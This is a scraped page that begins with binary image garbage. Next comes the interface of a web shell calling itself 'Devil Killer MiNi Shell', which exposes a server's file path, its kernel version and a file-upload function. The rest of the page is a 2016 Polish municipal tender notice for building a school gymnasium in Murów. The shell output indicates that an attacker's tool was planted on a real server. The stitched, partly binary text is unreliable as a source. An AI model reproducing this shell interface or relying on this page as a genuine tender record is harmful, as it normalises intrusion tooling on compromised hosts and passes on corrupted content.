JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160725/153891-N-2016.html

<p class="kh_header"><b>Murów: Budowa sali gimnastycznej z zapleczem socjalnym i łącznikiem do Publicznego Gimnazjum w Zagwiździu przy ul. Lipowej 68.</b><br>
<b>Numer ogłoszenia: 153891 - 2016; data zamieszczenia: 25.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murów , ul. Dworcowa 2, 46-030 Murów, woj. opolskie, tel. 0-77 4214034, faks 0-77 4214032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sali gimnastycznej z zapleczem socjalnym i łącznikiem do Publicznego Gimnazjum w Zagwiździu przy ul. Lipowej 68..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Budowa Sali gimnastycznej z zapleczem socjalnym i 
   łącznikiem do Publicznego Gimnazjum w Zagwiździu  zgodnie z 
   dokumentacją  projektową i specyfikacją techniczną wykonania i odbioru robót 
   budowlanych dokumenty  stanowiące załącznik do niniejszej specyfikacji.
2.Nieruchomość planowana do zabudowy obejmuje działki o numerach ewidencyjnych 612/4  i 614/3 z karty mapy 3, obręb ewidencyjny 0352 Zagwiździe, jednostka ewidencyjna  160906_  2 Murów. Obiekt sportowy będzie zlokalizowany w północnej części   przedmiotowych działek. Budynek został zaprojektowany jako jednokondygnacyjny,   niepodpiwniczony.Budynek będzie wykonany w technologii tradycyjnej, wyposażony w instalacje wewnętrzne: wodociągową, kanalizacyjną elektryczną oraz centralnego ogrzewania. Ławy   i stopy fundamentowe żelbetowe, ściany murowane z bloczków wapienno- piaskowych wzmocnione rdzeniami żelbetowymi, konstrukcja dachu nad salą gimnastyczną wykonana ze stalowych dźwigarów kratowych, natomiast nad częścią socjalną jako stropodach żelbetowy.
   
 1.   Charakterystyczne parametry inwestycji:
-      długość max.                           -  134,71[m]
-      szerokość max                         -  207,22[m]
-      powierzchnia zabudowy         -   1 841,04[m2]
-      powierzchnia użytkowa          -   1 690,87[m2]
-      kubatura                                  - 16 692,24[m3]

2. Zadanie polega na wykonaniu m.in. następującego zakresu prac:
-obsługę geodezyjną:
- wytyczenie geodezyjne terenu inwestycji;
- wykonanie operatów powykonawczych inwestycji;
-roboty przygotowawcze i rozbiórkowe:
- tymczasowe ogrodzenie terenu inwestycji;
- organizacja placu budowy ;
-roboty ziemne :
- usunięcie humusu;
- wykonanie wykopów;
- zasypanie i zagęszczenie wykopów;
- wyrównanie i uporządkowanie terenu po zakończeniu robót;
-roboty ogólnobudowlane:
- wykonanie żelbetowych ław i stóp fundamentowych;
- wykonanie izolacji przeciwwilgociowej fundamentów;
- wykonanie izolacji termicznej ścian fundamentowych ze styropianu ekstrudowanego;
- murowanie ścian z bloczków wapienno- piaskowych;
- wykonanie nadproży prefabrykowanych;
- wykonanie żelbetowej konstrukcji budynku ( strop, słupy, podciągi, wieńce itd.);
- montaż stalowej konstrukcji dachowej;
-wykonanie pokrycia dachowego;
-montaż systemu rynnowego oraz obróbek blacharskich;
-montaż stolarki okiennej i drzwiowej;
-wykonanie posadzek;
- tynkowanie ścian wewnątrz budynku;
- montaż stropu podwieszonego z płyt gipsowo- kartonowych na ruszcie metalowym;
-roboty wykończeniowe:
- ocieplenie budynku styropianem;
- wykonanie warstwy zbrojonej elewacji oraz tynku 
- wykonanie okładzin wewnętrznych na ścianach i podłogach;
- malowanie wnętrz budynku farbami emulsyjnymi;
- montaż wyposażenia 
-roboty instalacyjne :
- wykonanie instalacji elektrycznej wewnętrznej (min. Wykucie bruzd, wykonanie okablowania , montaż osprzętu, itd.);
- wykonanie instalacji nagłośnieniowej ( min. Wykucie bruzd, wykonanie okablowania, montaż osprzętu, itd.);
- wykonanie instalacji odgromowej;
- wykonanie instalacji centralnego ogrzewania ( min. Ułożenie rur, montaż grzejników, montaż pomp ciepła, itd.);
- wykonanie instalacji wodociągowo- kanalizacyjnej wewnętrznej ( min. Ułożenie rur, montaż armatury oraz wyposażenia itd.) oraz przyłączy wodociągowego i kanalizacyjnego;
- wykonanie instalacji wentylacyjnej ( min. Ułożenie przewodów wentylacyjnych, wykonanie izolacji przewodów, montaż urządzeń i osprzętu, itd.);

Wykonawca zobowiązany jest do zapewnienia nadzoru na budowie przez osoby z odpowiednimi uprawnieniami , wykonania dokumentacji powykonawczej, obejmującej:
          -dokumentację projektową z naniesionymi na niej zmianami i uzupełnieniami 
             dokonanymi w trakcie wykonywania robót;
          - operat geodezyjny powykonawczy;
          - dziennik budowy;
          - protokoły częściowe ;
          - protokoły wszystkich prób i badań;
          -dokumenty dotyczące jakości wbudowanych materiałów- świadectwa jakości 
            i  certyfikaty wydane przez dostawców materiałów i urządzeń.
Szczegółowy zakres robót jest określony w projekcie budowlanym architektury i konstrukcji opracowanym przez Machura Projekt Biuro Konstrukcji i Architektury inż. Łukasz Machura - opracowanie zbiorowe z kwietnia 2016 roku, Specyfikacji Technicznych Wykonania i Odbioru Robót stanowiących załącznik do niniejszej dokumentacji przetargowej.
Na realizację przedmiotowego zadania została wydana przez Starostę Opolskiego decyzja o pozwoleniu na budowę nr 309/2016 z dnia 10 maja 2016 roku.

3. Zamawiający przedstawiając nazwy własne w dokumentacji opisującej przedmiot 
    zamówienia miał na celu wyłącznie pokazanie w sposób jednoznaczny, o jakich   
    parametrach  technicznych  materiał ( urządzenie) należy użyć do wykonania robót     budowlanych. Użycie nazw własnych w żaden sposób nie sugeruje producenta, ma  jedynie charakter przykładowy. 
    Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie   
    innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem     zapewnienia parametrów nie gorszych   niż określone w tej dokumentacji oraz uzyskanie   akceptacji autora projektu. W takiej sytuacji Zamawiający wymaga złożenia stosownych   dokumentów, uwiarygodniających te materiały. Wykonawca, który powołuje się na   rozwiązania równoważne opisanym przez Zamawiającego   jest obowiązany wykazać,    że oferowane przez niego urządzenia i materiały spełniają wymagania określone przez  Zamawiającego. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora   dokumentacji projektowej , który sporządzi stosowną opinię. Opinia ta będzie podstawą 
do podjęcia przez Zamawiającego decyzji o odrzuceniu oferty z powodu nierównoważności zaproponowanych  zamienników. W przypadku zastosowania innych materiałów lub urządzeń Wykonawca, którego ofertę uznano za najkorzystniejszą zobowiązany jest: na własny koszt i ryzyko oraz własnym staraniem uzyskać zgodę Autora  Projektu na proponowane zmiany i w razie potrzeby opracować zamienną dokumentację  projektową, dokonać niezbędnych uzgodnień i przeprowadzić wymagane Prawem budowlanym zmiany.
 W przypadku nie dołączenia dokumentów uwiarygadniających zastosowanie urządzeń i  materiałów równoważnych Zamawiający uzna, że Wykonawca przedstawił w ofercie 
    urządzenia i materiały opisane w dokumentacji projektowej.
4. Wykonawca zobowiązany jest używać materiały i urządzenia do wbudowania:
a)	oznakowane CE, co oznacza, że dokonano oceny ich zgodności z normą zharmonizowaną albo europejską aprobatą techniczną bądź krajową specyfikacją techniczną państwa członkowskiego Unii Europejskiej lub Obszaru Gospodarczego, uznaną przez Komisję Europejską za zgodną z wymaganiami podstawowymi, alb 
b)	umieszczone w określonym przez Komisję Europejską wykazie wyrobów mających znaczenie dla zdrowia i bezpieczeństwa, dla których producent wydał deklarację zgodności z uznanymi regułami wiedzy technicznej, albo
c)	oznakowane znakiem budowlanym
5. Zaleca się aby każdy z Wykonawców dokonał wizji lokalnej celem sprawdzenia warunków związanych z wykonywaniem prac będących przedmiotem zamówienia oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do przygotowania oferty, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszt wizji lokalnej poniesie Wykonawca..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.22-8, 45.26.25.00-6, 45.26.00.00-7, 45.42.10.00-4, 45.44.21.00-8, 45.30.00.00-0, 45.23.10.00-5, 45.11.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający wymaga wniesienia wadium.
      Ustala się wadium w wysokości: 70.000,00PLN słownie: siedemdziesiąt  tysięcy 00/100 
 2.  Wadium należy wnieść przed terminem składania ofert, określonego  w Rozdziale  
      13 niniejszej SIWZ tj. do dnia 10.08.2016r godz. 10:00, przy czym za termin 
       wniesienia  wadium w formie pieniężnej za  pomocą przelewu bankowego  
      Zamawiający będzie  uważał za  skuteczne tylko wówczas, gdy bank 
       prowadzący  rachunek  Zamawiającego  potwierdzi, że otrzymał taki przelew   przed upływem  terminu  składania ofert.
 3.   Wadium może być wnoszone w jednej lub kilku następujących formach:
              1)    w pieniądzu,
              2)     w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-   kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem    pieniężnym,
           3)     w gwarancjach bankowych
           4)    w gwarancjach ubezpieczeniowych,
           5)  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.   5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji 
                   Rozwoju  Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. zm).

Wadium wnoszone w pieniądzu wpłaca się PRZELEWEM na rachunek bankowy   
Zamawiającego Bank  Spółdzielczy Łubniany  Nr  21 8897 0004 2001 0006 0163 0003  z  dopiskiem Wadium -Sala gimnastyczna z zapleczem socjalnym i łącznikiem do Publicznego Gimnazjum w Zagwiździu przy ul. Lipowej 68.
Do oferty należy dołączyć kopię polecenia przelewu lub kserokopię potwierdzoną za     zgodność z oryginałem- przez osoby odpowiednio upoważnione do reprezentowania.
Wadium wnoszone w formie poręczeń lub gwarancji winno być złożone w oryginale.
Oryginał dokumentu wraz z jego kopią ( potwierdzoną za zgodność z oryginałem) należy dołączyć do oferty w oddzielnej kopercie.          
Oferta nie zabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie wykluczona bez rozpatrywania.
4. Wadium składane w formie gwarancji i/lub poręczenia, gwarancja i/lub poręczenie   
      powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, między   innymi następujące elementy: 
       1)   nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji i/lub poręczenia    (Zamawiającego),gwaranta i/lub poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji i/lub poręczenia) oraz wskazanie ich siedzib.
      2)   dokładne przytoczenie nazwy i przedmiotu niniejszego postępowania
      3)  precyzyjne określenie wierzytelności, która ma być zabezpieczona gwarancją i/lub   poręczeniem,
      4)    kwotę gwarancji i/lub poręczenia,
      5)    termin ważności gwarancji i/lub poręczenia 
      6)  zobowiązanie gwaranta i/lub poręczyciela do: nieodwołalnego i bezwarunkowego  zapłacenia kwoty gwarancji i/lub poręczenia na pierwsze pisemne żądanie   Zamawiającego zawierającego oświadczenie, iż:
             - Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, dokumentów  lub pełnomocnictw o którym mowa w art. 26 ust. 3 Ustawy Pzp., nie złożył  wymaganych   dokumentów lub oświadczeń, o których  mowa w art. 25 ust. 1 Ustawy  Pzp. lub pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której  mowa w art. 24 ust. 2 pkt 5, lub informacji  o tym, że nie należy do grupy kapitałowej,  lub nie  wyraził zgody na poprawienie omyłki , o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez  Wykonawcę jako  najkorzystniejszej chyba,  że Wykonawca udowodni, że wynika to z przyczyn  nieleżących   po jego stronie, 
           -   Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach  określonych w ofercie , 
           -   Wykonawca, którego ofertę wybrano nie wniósł zabezpieczenia należytego  wykonania umowy, 
           -  zawarcie umowy, z Wykonawcą, którego ofertę wybrano, stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
    
5.  Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze  
      najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy,którego oferta zostanie wybrana jako najkorzystniejsza. 
6.   Wykonawcy , którego oferta zostanie wybrana jako najkorzystniejsza Zamawiający   zwróci wadium niezwłocznie po zawarciu umowy .
7.  Zamawiający zwróci niezwłocznie wadium  wraz z odsetkami na wniosek Wykonawcy,   który wycofał ofertę przed terminem składania ofert.
8.   W sprawie wadium obowiązują uregulowania ustawy- Prawo zamówień publicznych
      zawarte w art. 45 i 46.
9.  Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie   Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
10. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wadium (w każdej z dopuszczalnych form) może być wniesione przez jednego, kilku lub wszystkich Wykonawców, pod warunkiem, iż łączna wysokość wniesionego wadium  odpowiadać będzie wymaganej kwocie. W takim przypadku składając wadium należy wskazać w imieniu kogo i tytułem jakiego postępowania jest wnoszone.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu tego  warunku  - załącznik nr 2 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże iż, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonali w sposób należyty zgodnie z zasadami sztuki budowlanej i   prawidłowo ukończyli jedną robotę budowlaną dotyczącej budowy, przebudowy,  remontu  lub rozbudowy  budynku mieszkalnego, zamieszkania zbiorowego lub użyteczności publicznej ( zdefiniowanym w Rozporządzeniu Ministra Infrastruktury  z dnia 12.04.2002r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. Nr 75, poz. 690, z późn.  zmianami o  wartości nie     mniejszej niż  2 000 000,00zł brutto ( słownie: dwa miliony 00/100). W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub 
 więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich Wykonawców 
 łącznie.
Zamawiający dokona oceny spełnienia przez Wykonawców udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody  spełnia/ nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań. Zamawiający uzna warunek
        za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu tego warunku- 
        załącznik   nr 2 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wskazać, że dysponuje osobami zdolnymi do wykonania   zamówienia tj.
-kierownik budowy branży konstrukcyjno- budowlanej -zobowiązany jest posiadać uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności konstrukcyjno-budowlanej ( lub im odpowiadające) oraz co najmniej 5-letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie, w ramach którego zobowiązany jest wykazać, że pełnił funkcję kierownika budowy lub robót przy co najmniej jednym zadaniu o wartości nie mniejszej niż  2 000 000,00zł brutto;
-kierownik robót  branży instalacyjnej - zobowiązany jest posiadać uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych ( lub im odpowiadające) oraz co najmniej 3-letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie;
-kierownik robót branży elektrycznej - zobowiązany jest posiadać uprawnienia budowlane bez ograniczeń do kierowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych ( lub im odpowiadające) oraz co najmniej 3- letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie.
Ww. osoby zobowiązane są przynależeć do właściwych izb samorządu zawodowego.

Uprawnienia o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994r .Prawo Budowlane ( tekst jednolity  Dz.U. z 2016r., poz. 290), rozumie się przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia  o Wolnym Handlu (EFTA)- stron umowy o Europejskim Obszarze Gospodarczy, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 18marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U.nr 63,poz.394). Uprawnienia winny być zgodne z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U. z 2014r. poz.1278 lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej
Wykonawców ocena w/w warunku dotyczyć będzie wszystkich Wykonawców łącznie.
Zamawiający dokona oceny spełnienia przez Wykonawców udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody  spełnia/ nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
  działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż
 1 000 000,00 PLN ( słownie: jeden milion złotych).
 W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej
Wykonawców ocena w/w warunku dotyczyć będzie wszystkich Wykonawców łącznie.
Zamawiający dokona oceny spełnienia przez Wykonawców udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody  spełnia/ nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

